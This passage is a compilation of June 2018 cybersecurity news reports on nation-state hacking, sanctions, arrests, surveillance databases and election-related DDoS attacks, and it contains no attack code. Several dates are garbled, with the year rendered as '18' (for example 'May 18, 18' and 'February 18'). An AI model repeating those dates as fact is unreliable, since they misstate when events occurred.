As for leaking CIA hacking tools, Schulte told the press last month that the FBI likely suspected him due to the fact that he had left the CIA on poor terms just months before the Vault 7 leak started.


In Trump Rebuke, US Senate Votes to Reimpose Ban on China's ZTE
19.6.18 securityweek  BigBrothers

The US Senate defied President Donald Trump by voting Monday to overrule his administration's deal with Chinese telecom firm ZTE and reimpose a ban on high-tech chip sales to the company.

Senators added an amendment targeting ZTE into a sweeping, must-pass national defense spending bill that cleared the chamber on an 85-10 vote.

The company has been on life support ever since Washington said it had banned US companies from selling crucial hardware and software components to ZTE for seven years, after staffers violated trade sanctions against Iran and North Korea.

It was fined $1.2 billion for those violations, but earlier this month the Trump administration gave ZTE a lifeline by easing sanctions in exchange for a further $1.4 billion penalty on the company.

The Senate measure nullifies that action, proposing an outright ban on the government buying products and services from ZTE and another Chinese telecoms firm, Huawei.

"We're heartened that both parties made it clear that protecting American jobs and national security must come first when making deals with countries like China, which has a history of having little regard for either," a bipartisan group of senators said.

Hong Kong-listed shares in ZTE plunged more than 20 percent soon after the opening bell on Tuesday. The company has lost around 60 percent of its value since it resumed trading last week after a two-month suspension that followed the initial ban. The lawmakers, who introduced the amendment, include top Democrat Chuck Schumer and Republican Marco Rubio.

Providing $716 billion in funding for national defense for fiscal year 2019 and giving policy guidance to the Pentagon, the bill is not a done deal.

The House of Representatives passed its own version of the measure, and the two chambers must now hash out a compromise.

"It is vital that our colleagues in the House keep this bipartisan provision in the bill as it heads towards a conference," Schumer and Rubio said.

ZTE, which employs 80,000 people, said recently that its major operations had "ceased" after the ban, raising the possibility of its collapse.

Its fiberoptic networks depend on US components and its cheap smartphones sold en masse abroad are powered by US chips and the Android operating system.


DHS, FBI Share Details of North Korea's 'Typeframe' Malware
18.6.18 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have published another report on the US-CERT website detailing a piece of malware allegedly used by the North Korean government.

A dozen reports have been published by the DHS and the FBI over the past year on the North Korea-linked threat group tracked by the U.S. government as Hidden Cobra. The list of tools detailed by the agencies includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest report describes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples related to the threat, including executable files and malicious Word documents containing VBA macros.Typeframe malware used by North Korea detailed by FBI and DHS

“These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections,” the agencies said.

The alert contains indicators of compromise (IoCs) for each of the files, including a description of their functionality, hashes, IPs, antivirus detections, metadata, and YARA rules.

The goal of the report is to “enable network defense and reduce exposure to North Korean government malicious cyber activity.” However, security experts argued in the past that these types of alerts from government agencies are actually not enough to help improve defenses.

The previous Hidden Cobra report, published on the US-CERT website in late May, attributed the Joanap backdoor trojan and the Brambul worm to the North Korean government.

While it has always denied accusations, experts say North Korea continues to be highly active in cyberspace, with some claiming that the country is even more aggressive than China. Recent attacks attributed to North Korea involved new malware and even zero-day vulnerabilities.


Cyber Attack Aims to Manipulate Mexican Election
18.6.18 securityweek   BigBrothers

On Wednesday June 13, in the run-up to Mexico's July 1 presidential election, a website operated by the rightist National Action Party (PAN) was taken off-line for several hours by a DDoS attack. The outage occurred at the time of a televised presidential debate, and just following a point at which the PAN candidate held up a placard with the website address claiming it held proof of potential corruption.

PAN secretary Damian Zepeda later suggested that front-running leftist candidate Andres Manuel Lopez Obrador (AMLO) was behind the attack. "The AMLO bots have been activated to try to crash the page debate18.mx where there are proofs of contracts worth millions given to AMLO's friend," Zepeda wrote on Twitter.

PAN later claimed that the site had been hit by 185,000 visits in 15 minutes, "with the attacks coming mainly from Russia and China." Lopez Obrador denied any involvement in the attack, and laughed off any suggestion of ties with Russia by calling himself 'Andres Manuelovich'.

The source of the DDoS attack is unknown and possibly unknowable -- but it is a reminder of the extent to which the internet can be used to influence or even control public opinion.

The accusations of Russian involvement in both the Trump election in the U.S. and the UK Brexit referendum are still fresh. Perhaps more directly relevant is the controversy over the DDoS attack on the FCC website just as it was gathering public comment on the (then) proposed elimination of the net neutrality rules.

The FCC claimed it had been taken off-line by a DDoS attack. Critics of the FCC plans have suggested it was purposely taken off-line to avoid registering mass public dissent over the FCC rules. If the Mexico event was a direct parallel to these claims, it could suggest that PAN couldn't prove the criticisms it was making, and took down the website itself.

This last possibility is not a serious proposal -- but it illustrates the plausible deniability and difficulty of attribution that comes with cyber activity. The DDoS attack could have been delivered by Russia (because it has a history of interference); by AMLO (to prevent access to his competitor's website); by the U.S. (because it would almost certainly prefer a right-leaning to a left-leaning neighbor); or by PAN itself (as a false flag). Or, of course, none of the above -- a straightforward DDoS attack by cybercriminals.

At this stage, the only thing is certain is that a DDoS attack did take place in Mexico. Netscout Arbor's analysis of the period shows more than 300 attacks per day in Mexico during the period 12th-13th June -- which is 50% higher than the normal frequency in the country. The largest volumetric DDoS attack targeting Mexico during the week was more than 200 Gbps.

"Political websites are frequent targets of DDoS attacks not only due to the ease of launching attacks, but also due to the desire and capabilities of attackers to impact the election process while staying undiscovered," comments Kirill Kasavchenko, principal security technologist at Netscout Arbor. "Due to the nature of modern DDoS attacks, it is quite easy to launch attacks from third countries utilizing computers and IoT devices infected by malware or using techniques like reflection of DDoS traffic. Tracing down the original source of the attack and the people behind it is problematic not only from a technical, but also from an administrative point of view."


DHS, FBI published a join alert including technical details of Hidden Cobra-linked ‘Typeframe’ Malware
18.6.18 securityaffairs BigBrothers

The US DHS and the FBI have published a new joint report that includes technical details of a piece of malware allegedly used by the Hidden Cobra APT.
A new joint report published by US DHS and FBI made the headlines, past document details TTPs associated with North Korea-linked threat groups, tracked by the US government as Hidden Cobra.

The US authorities have published the report to reduce the exposure to the activities of North Korea-linked APT groups.

Hidden Cobra’s arsenal includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest joint report includes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples analyzed by the government experts.

The researchers analyzed several executables and weaponize Word documents containing VBA macros.

“DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.” reads the joint report.

“This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim’s firewall to allow incoming connections.”

Hidden Cobra

The security alert includes indicators of compromise (IoCs) for each of the sample analyzed by the experts.

The report includes a description of the functionality for each sample, hashes, IPs, antivirus detections, metadata, and YARA rules.

In May, US authorities published another report on the Hidden Cobra detailing the Joanap backdoor trojan and the Brambul worm.

The unique certainly is that North Korea continues to be one of the most aggressive and persistent threat actors in the cyberspace.


Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang
16.6.18 securityaffairs BigBrothers

The Europol announced that several French nationals were arrested in the past year on suspicion of being involved with notorious Rex Mundi crime gang.
Another success of the Europol made the headlines, the European police announced that several French nationals were arrested in the past year on suspicion of being involved with notorious hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012. it hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).


The hackers used to steal sensitive information from the victims, then they demanded fees for not disclosing the stolen data.

The operation coordinated by the Europol was launched in May 2017 after the group targeted a UK-based company. Crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also asked the victim additional €210,000 ($240,000) for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eight in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT) that started exactly one year ago.” reads the announcement published by the Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that lead to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” continues the Europol.

In June 2017, the authorities identified and arrested five suspects, two were arrested in October 2017 and one on May 18, 18.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer that was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.


Singapore was hit by an unprecedented number of attacks during the Trump-Kim Summit
16.6.18 securityaffairs BigBrothers

Researchers observed a spike in the number of cyber-attacks targeting Singapore during the Trump-Kim Summit, from June 11 to June 12.
Researchers at F5 Labs have observed a spike in the number of cyber-attacks targeting Singapore from June 11 to June 12, in the wake of the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel.

Experts remarked that typically Singapore is not a top attack destination, and the skipe of the number of attacks coincides with Trump-Kim Jong-un meeting.

Most of the attacks originated from Russia (88% of overall attacks) and frankly speaking, I’m not surprised due to the importance of the Trump-Kim summit.

According to F5 Labs and Loryka, 97% of all the attacks that originated from Russian from June 11 to June 12 targeted Singapore.

“From June 11 to June 12, 18, F5 Labs, in concert with our data partner, Loryka, found that cyber-attacks targeting Singapore skyrocketed, 88% of which originated from Russia. What’s more, 97% of all attacks coming from Russia during this time period targeted Singapore.” reads the analysis published by F5 Labs. “We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel.”

The cyber attacks hit almost any computer system, from VoIP phones to IoT devices. The attacks began out of Brazil targeting port SIP 5060 of IP phones where communications are transmitted in clear text.

After an initial attack that lasted for a couple of hours, researchers observed a reconnaissance activity originated from the Russian IP address 188.246.234.60 that is owned by ASN 49505, operated by Selectel; the scans targeted a variety of ports.

None of the attacks was carried out to spread malware.

“The number two attacked port was Telnet, consistent with IoT device attacks that could be leveraged to gain access to or listen in on targets of interest.” continues the analysis.

“Other ports attacked include the SQL database port 1433, web traffic ports 81 and 8080, port 7541, which was used by Mirai and Annie to target ISP-managed routers, and port 8291, which was targeted by Hajime to PDoS MikroTik routers.”

Singapore was hit by 40,000 attacks in just 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time.

The experts highlighted that only 8% were exploit attacks, while 92% were reconnaissance scans for potential targets.

34% of the attacks originated from Russia, the list of top attackers includes China, the US, France, and Italy.

Singapore attacks Trump-Kim Summit

Trump-Kim Summit

During the summit time frame, Singapore was the top destination of cyber-attacks, it received 4.5 times more attacks than countries like the U.S. and Canada.

The SIP port 5060 was targeted 25 times more than Telnet port 23, hackers were attempting to gain access to insecure communication systems or VoIP server and to compromise IoT devices to spy on communications.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 Labs concludes.


Trump-Kim Summit Attracts Wave of Cyber-Attacks on Singapore
16.6.18 securityweek BigBrothers

The number of cyber-attacks targeting Singapore skyrocketed from June 11 to June 12, during the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel, and most of these attacks originated from Russia, F5 Labs reports.

Russia has long been said to keep the United States under a continuous barrage of cyber-attacks, and even attracted a series of sanctions following the hacking aimed at the 2016 presidential election, which was supposedly the doing of state-sponsored Russian threat actors.

Thus, it’s no wonder the Trump-Kim summit earlier this week was targeted as well, but the number of assaults coming from Russia is indeed impressive: 88% of the total number of observed cyber-attacks came from this country. Furthermore, 97% of all the attacks that originated from Russian during the timeframe targeted Singapore, data from F5 Labs and Loryka reveals.

“We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel. The attacks targeted VoIP phones and IoT devices, which appears to be more than a mere coincidence,” F5 says.

The flurry of attacks, the security firm reveals, started out of Brazil by targeting port SIP 5060, the single most attacked port in the timeframe. IP phones use this port to send and receive communications in clear text.

This initial phase, which lasted for only a couple of hours, was followed by reconnaissance scans from the Russian IP address 188.246.234.60 – an IP owned by ASN 49505, operated by Selectel – targeting a variety of ports.

The attacks observed on June 11 and June 12 also targeted the Telnet port, which is normally assaulted in Internet of Things (IoT) incidents. Other targeted ports include SQL database port 1433, web traffic ports 81 and 8080, port 7541 (used by Mirai and Annie to target ISP-managed routers), and port 8291 (previously targeted by Hajime).

During a period of 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time, a total of 40,000 attacks were launched on Singapore. Of these, 92% were reconnaissance scans looking for vulnerable devices, while the remaining 8% were exploit attacks.

“Thirty-four percent of the attacks originated from Russian IP addresses. China, US, France, and Italy round out the top 5 attackers in this period, all of which launched between 2.5 to 3 times fewer attacks than Russia. Brazil, in the sixth position, was the only other country we detected launching SIP attacks alongside Russia,” F5 reveals.

During the period, Singapore became the top destination of cyber-attacks by a large margin, receiving 4.5 times more attacks than the U.S. or Canada. Typically, Singapore is not a top attack destination, and the anomaly coincides with President Trump’s meeting with Kim Jong-un.

While Russia was the main source of attacks, accounting for 88% of them, Brazil was the second largest attacker, launching 8% of the assaults. Germany rounded up top three attackers, with 2%.

The security researchers also note that there was no attempt made to conceal the attacks launched from Russia and that none of the attacks originating from this country carried malware.

The SIP port 5060 received 25 times more attacks than Telnet port 23, which was the second most targeted. Although attacks on port 5060 are unusual, chances are that the attackers were attempting to gain access to insecure phones or perhaps the VoIP server. The attacks on Telnet were likely trying to compromise IoT devices to spy on communications and collect data.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 concludes.


French Nationals Arrested for 'Rex Mundi' Hacks
16.6.18 securityweek BigBrothers

Europol announced this week that several French nationals were arrested in the past year on suspicion of being involved with Rex Mundi, a group that hacked into the systems of several organizations and attempted to blackmail them.

According to Europol, the alleged members of the hacker group were identified after in May 2017 they targeted a UK-based company. The cybercriminals stole significant amounts of customer data from the firm and demanded the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not making the stolen files public or more than €825,000 ($776,000) for information on how the attack was carried out. The hackers also told the victim that the amounts would increase by €210,000 ($240,000) for each day the payment was delayed.

After the victim reported the attack to law enforcement, the UK’s Metropolitan Police, the French National Police and Europol teamed up to identify the hackers. “Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol said.

Five suspects were arrested in June 2017, two were arrested in October 2017 and one was apprehended on May 18, 18. All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The individual who was arrested last month by the Royal Thai Police is a 25-year-old developer. The suspects arrested in October 2017 were described as “hackers.” The “main suspect,” as Europol describes him, admitted blackmailing companies, but claimed to have used the dark web to hire someone to conduct the hacking.

Rex Mundi was active since at least 2012 and until 2015 it made many of its operations public in hopes of convincing victims to pay up. Its victims included AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE). Many of the hacker group’s victims were Belgian companies.


European Parliament Votes to Ban Kaspersky Products
14.6.18 securityweek BigBrothers  

Kaspersky Suspends Collaboration With Europol and NoMoreRansom

Kaspersky Lab has suspended its collaboration with Europol and the NoMoreRansom initiative after the European Parliament passed a resolution that describes the company’s software as being “malicious.”

Kaspersky is not trusted by some governments due to its alleged ties to Russian intelligence, which has sparked concerns that the company may be spying for Moscow.

The call for a ban on Kaspersky’s products in the European Union is part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

The next-to-last proposal in the report “Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.”

The resolution was approved with 476 votes in favor and 151 against. In response, Kaspersky Lab’s founder and CEO, Eugene Kaspersky, said his company would be freezing collaboration with Europol and the NoMoreRansom project, and highlighted that the EU’s decision “welcomes cybercrime in Europe.”

Kaspersky is one of the private sector companies that founded NoMoreRansom, and it has helped Europol in several major cybercrime investigations, including a $1 billion cyber-heist.

“[It is] frustrating that there was no investigation, no evidence of any wrongdoing from our side, just references to false allegations from anonymous sources. This is the essence of media-ocracy: fake news → political decisions,” Eugene Kaspersky said on Twitter. “The risks of using our software are purely hypothetical. Just as hypothetical as with any other cybersecurity software of any country. But the risk of becoming a victim of a genuine cyberattack is real – and extremely high. Ergo: EP's political decision plays *for* cybercrime.”

Interestingly, an answer given in April by the European Commissioner for Digital Economy and Society, Mariya Gabriel, in response to a question from Polish politician Anna Fotyga regarding the risks associated with the use of Kaspersky software states that “the Commission has no indication for any danger associated with this anti-virus engine.”

On the other hand, Paet says he stands by his report. “These decisions must be taken seriously, they have not been taken out of the blue but instead have been drawn from various partners and intelligence sources. Considering the overall situation of EU-Russia relations, and Russia’s aggressive behaviour, we should not be taking risks that could cause serious damage to the EU,” he told EURACTIV after the vote.

The report is not legally binding, but it could influence some EU member states, especially since the U.K., the Netherlands and Lithuania have already moved to ban the use of Kaspersky software on sensitive systems. Kaspersky took legal action in the United States in an effort to overturn a decision to prohibit the use of its products by government agencies, but a judge rejected the lawsuit.

Many in the cybersecurity industry are skeptical of the accusations against Kaspersky, especially since no evidence of wrongdoing has been provided and many decisions related to the company appear to be based on media reports.

Reaction to EU vote to ban Kaspersky products

The security firm has been trying to clear its reputation, first by launching a transparency initiative that included giving partners access to source code, and more recently by announcing a move of core processes from Russia to Switzerland.


DHS HART Biometric Database Raises Security, Civil Liberties Concerns
13.6.18 securityweek BigBrothers

Protecting the DHS HART National Biometric Database Against Theft and Abuse

In February 18, Northrop Grumman Corporation announced that it had been awarded a $95 million contract to develop increments one and two of the Department of Homeland Security (DHS) Homeland Advanced Recognition Technology (HART) system.

The announcement said very little about HART, except that it is a "multi-modal processing and matching technology that uses a combination of face, finger and iris biometrics meeting DHS accuracy requirements." It is a database and system designed to incorporate, expand and replace the existing Automated Biometric Identity System (IDENT) built in the 1990s.

Last week the Electronic Frontier Foundation (EFF) provided more information on HART. In a Deeplinks blog, senior staff attorney Jennifer Lynch explained, "The agency's new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics -- from face recognition to DNA, data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments."

HART will support, she expands, "at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for 'other modalities'. It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to be highly subjective, including information collected from officer 'encounters' with the public and information about people's 'relationship patterns'."

EFF's primary concern over this vast new database of DNA, physical biometrics and social behavior is what it describes as the chilling effect on people exercising their First Amendment-protected rights to speak, assemble and associate. "Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings," she writes.

Through EFF's understanding of the HART project and its concern over civil liberties, we now know more about the DHS biometric database. But there are other concerns beyond civil liberties. Security for this vast trove of the nation's most personal information is never mentioned. Indeed, Northrop Grumman's contract announcement merely states, "A keen focus on safeguarding personally identifiable information as well as ensuring the critical sharing of data across interagency partners underpins the technology."

But government does not have a good track record in securing the data it holds. In 2015, The Office of Personnel Management lost personal information on 21.5 million people to what is generally believed to be Chinese government-sponsored hackers.

In 2010, Chelsea Manning (born Bradley Manning) leaked 750,000 classified or sensitive military and diplomatic documents to WikiLeaks, including the infamous 'collateral murder' Baghdad airstrike video.

In 2013, Edward Snowden exfiltrated and leaked thousands of classified NSA documents exposing NSA and GCHQ clandestine global surveillance programs.

In 2016, the hacking group known as The Shadow Brokers leaked a series of exploits stolen from the Equation Group – believed to be the Tailored Access Operations (TAO) unit of the NSA. One of these exploits, EternalBlue, was used in both the WannaCry ransomware and NotPetya cyberattacks of 2017.

In March 2017, WikiLeaks began publishing a series of CIA classified documents and cybersecurity exploits under the name Vault 7.

These incidents demonstrate that government databases have historically been susceptible to both external hacks and insider breaches. However, the extent to which the HART database will become a magnetic target for hackers is conjecture, and not universally agreed.

Joseph Carson, chief security scientist at Thycotic, doesn't believe the database will be very attractive to hackers. "The only reason this would be attractive to cybercriminals," he told SecurityWeek, "would be to sell it onwards to nation states who would use such data for intelligence or economic advantages. However, the data alone would not be as valuable without the technology that analyzes the metadata for matches and relationships. So, cybercriminals and nation states would need to compromise both to make value of the stolen data."

Others take a different view. "This massive, aggregated database will represent an incomparable trove of intelligence about US citizens. You can be sure it will be a target," said Rick Moy, CMO at Acalvio.

Migo Kedem, director of product management at SentinelOne, adds, "There will be many criminals and states who would like to get their hands on this type of information, ranging from commercial and marketing, through business espionage to state level."

Protecting this database from external hackers, whether organized crime or nation states, is going to be a challenge. But it will be equally difficult to protect it from insiders. According to the EFF's figures, the IDENT fingerprint database already holds data on 220 million individuals, and processes 350,000 fingerprint transactions every day. The full HART database will go far beyond just fingerprints, and will be shared with federal agencies outside of DHS, with state and federal law enforcement, and even with foreign governments.

The ability to control everybody with access to the database will consequently be another challenge – health workers and policemen already covertly query their own databases to provide information for worried friends and relatives. The temptation to check on the relationship patterns of a daughter's new boyfriend – if possible – is just one danger. Looking at private industry, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek, "Data protection is certainly a high priority in large companies such as Google or Apple, but as we recently saw with Facebook – authorized third-parties are the uncontrollable Achilles' heel."

The subversion of authorized users through bribery, blackmail or stolen credentials is another difficulty. "When human interactions are involved, it is generally the easiest link to compromise," says SentinelOne's Kedem.

Just as securing access to the HART database will be difficult, so too will be securing the use of the database. While it can provide value to its users manually, there is little doubt that machine learning and artificial intelligence will be used to help locate the needles in this massive haystack. This is particularly concerning because of the intention to include 'relationship patterns', which will be easier sifted with AI than manual searches.

Indeed, it is tempting to wonder if HART will become the basis for the FBI's often-promised move into 'predictive policing'. Thycotic's Carson believes this is probable. "This goes way back," he said. "'Trapwire' was exposed by Wikileaks back in 2012 resulting from the Stratfor hacks. It reportedly used CCTV surveillance to recognize people from their facial biometrics, how they walked and even from the clothing they wear. The purpose of such technology was prioritized for national security and it has been known that such technology had existed; but this was a clear indication that it was formerly in use. However, it is now clear that such data is being used beyond national security in both government and commercial use for profit and control."

Acalvio's Rick Moy simply said, "Predictive models need tons of data, so it would certainly be an enabler."

But this brings us to the next problem: false positives potentially generated by built-in bias in the artificial intelligence algorithms. Carson is not too concerned: "I would assume the results would have to be verified by a human. The AI and machine learning is typically to find the needle in a haystack and a human is used to validate the results."

Moy, however, does have concerns. "False positives come with any algorithm based on diverse data inputs. Bias is a human trait, and humans are still writing the algorithms. But it's worth noting that there's quite a difference between searching for known features of a past incident versus asking a system what the most relevant features of an incident were, versus predicting who will commit a future crime."

The implication is that use of the HART database to identify suspects is likely to be very accurate; but its use to predict criminal, terrorist or simply anti-social behavior would be worrying. If there is a bias against certain ethnic groups for, say, criminal or terrorist activity within society and existing records, that bias can potentially be transferred to the AI algorithms resulting in damaging and far-reaching false positives.

"US Congress needs to look at the old adage of 'we could, but should we?' while going forward with the DHS HART database," comments Abhishek Iyer, Technical Marketing Manager at Demisto. "AI and ML algorithms often mirror and amplify the biases of the data collected. If DHS investigation will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources."

There is little doubt that a national biometric database could help law enforcement. But at what cost? The Electronic Frontier Foundation fears is will damage freedom of speech and association, and massively impinge upon personal privacy. But the challenges posed by HART go beyond civil liberties. Securing both access to and use of the data is going to be very difficult.


North Korean Hackers Abuse ActiveX in Recent Attacks
12.6.18 securityweek  BigBrothers

An ActiveX zero-day vulnerability discovered recently on the website of a South Korean think tank focused on national security has been abused by the North Korean-linked Lazarus group in attacks, AlienVault reports.

ActiveX controls are usually disabled on most systems, but the South Korean government demands they are enabled on machines in the country. This has led to numerous attacks abusing ActiveX to compromise systems in South Korea, with many of the attacks attributed to North Korean hackers.

The same applies to the newly observed attacks, where JavaScript code was used to deploy various ActiveX vulnerabilities, including a zero-day. Soon after the attacks occurred, local media attributed them to the Andariel gang, which is said to be part of Lazarus, the state-sponsored hacking group considered the most serious threat against banks.

Also referred to as BlueNoroff, the group has orchestrated high profile attacks such as the devastating attack against Sony Pictures in late 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. This year, the actor supposedly switched targets to cryptocurrency, but also hit an online casino in Central America.

According to a new AlienVault report, the Lazarus hackers were behind the recently revealed ActiveX attacks as well.

The group used a profiling script as the initial reconnaissance tool, in an attempt to gather information on possible targets. Although this is a tactic the Lazarus group has employed before, other threat actors use it as well.

The next step of the attack involved scripts capable of gathering additional information from the system and designed to deliver the ActiveX exploit.

In a tweet several weeks ago, Cyber Warfare Intelligence Center and IssueMakersLab founder Simon Choi shared some details on the scripts used in the assault, revealing that an initial reconnaissance stage was deployed in January 2017, while script injections only occurred in late April 18.

The script was designed to identify the browser and operating system running on the victim’s machine and borrows much of the code from PinLady’s Plugin-Detect. When detecting Internet Explorer on a machine, the script checks if ActiveX is enabled, as well as plugins running (from a specific list of ActiveX components).

AlienVault also notes that one of the other scripts involved in the attack, apparently used for profiling, sends data to a website that might have been compromised a while back, as it was previously recorded as a command and control (C&C) server for Lazarus malware in 2015.

The ActiveX exploit used in the recent assault, also shared by Simon Choi on Twitter, was meant to download malware from peaceind[.]co.kr and save it to the system as splwow32.exe.

“Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable,” AlienVault says.

The malware appears to be called Akdoor, a simple backdoor designed to execute commands using Command Prompt. The malware also uses a “distinctive command and control protocol,” the security researchers say.


U.S. Blacklists Russian Firms Tied to FSB Hacking Ops
12.6.18 securityweek BigBrothers

The United States placed five Russian companies and three individuals on its sanctions blacklist Monday for allegedly supporting the FSB intelligence agency's hacking operations, including a firm involved in subsea operations.

The US Treasury named Digital Security and two subsidiaries as helping develop offensive cyber capabilities for Russian intelligence services, including the already-sanctioned FSB.

The Kvant Scientific Research Institute was also included on the blacklist, as a state enterprise supervised by the FSB.

In addition, Divetechnoservices and three officials of the firm were sanctioned for supplying and supporting the government's underwater capabilities in monitoring and hacking subsea communications cables around the world.

US officials have become alarmed over the past year at the extent of US-targeted offensive cyber operations that Washington alleges have official backing from Moscow.

Those include the global NotPetya cyber attack, which paralyzed thousands of computers around the world last year; intrusions into the control systems of the US energy grid; and the insertion of trojans into home and company networking devices around the world, which allow both the diversion of data and attacks that could shut down networks.

The sanctions freeze property and assets under US jurisdiction and seek to lock those named out of global financial networks.


Vietnam MPs Approve Sweeping Cyber Security Law
12.6.18 securityweek BigBrothers

Vietnamese lawmakers on Tuesday approved a sweeping cyber security law which could compel Facebook and Google to take down critical posts within 24 hours, as space for debate is crushed inside the Communist country.

Activists and dissenters are routinely harassed, jailed or tied up in legal cases in Vietnam, a one-party state which is hyper-sensitive to critical public opinion.

Social media and Internet forums have provided a rare platform to share and debate views against authorities.

But the bill, waved through by an overwhelming majority of MPs in the National Assembly, is poised to end that relative freedom.

The law's far-reaching provisions mean internet companies will have to remove posts deemed to be a "national security" threat within a day and store personal information and data of their users inside Vietnam.

"Currently, Google and Facebook store personal data of Vietnamese users in Hong Kong and Singapore," Vo Trong Viet, chairman of National Assembly's defence and security committee told lawmakers.

"Putting data centres in Vietnam will increase expenses for the service providers... but it is necessary to meet the requirements of the country's cyber security."

The new law outlaws material encouraging public gatherings or that "offends" everything from the national flag to the country's leaders and "heroes".

There was no immediate detail of the punishment for violating the new rules.

Only 15 out of the 466 MPs present in the rubber-stamp assembly voted against the bill, which the government says will become law from January 1, 2019.

Rights advocates said it further shrinks the small space for debate.

"In the country's deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities," said Clare Algar of Amnesty International.

"With the sweeping powers it grants the government to monitor online activity, this vote means there is now no safe place left."

The Asia Internet Coalition, an advocacy group for behalf of Facebook, Google, Twitter and other tech firms in the region, said it was "disappointed" by the assembly's vote.

"Unfortunately, these provisions, will result in severe limitations on Vietnam's digital economy, dampening the foreign investment climate and hurting opportunities for local businesses and SMEs to flourish inside and beyond Vietnam," said Jeff Paine, managing director of the internet coalition.

The country's conservative leadership, which has been in charge since 2016, is waging a crackdown on activists and dissidents.

At least 26 dissidents and actives have been prosecuted during the first five months this year, according to Human Rights Watch.

The government has also unveiled a 10,000-strong brigade to fight cybercrimes and "wrongful views" on the internet, according to state media reports.

The unit, dubbed Force 47, is also tasked with fighting anti-state propaganda on the web.


Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams
12.6.18 securityaffairs BigBrothers

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.
On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The authorities conducted the investigation for over six months, 42 suspects have been arrested in the United States, 29 in Nigeria, the remaining in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to recover of roughly $14 million in fraudulent wire transfers.

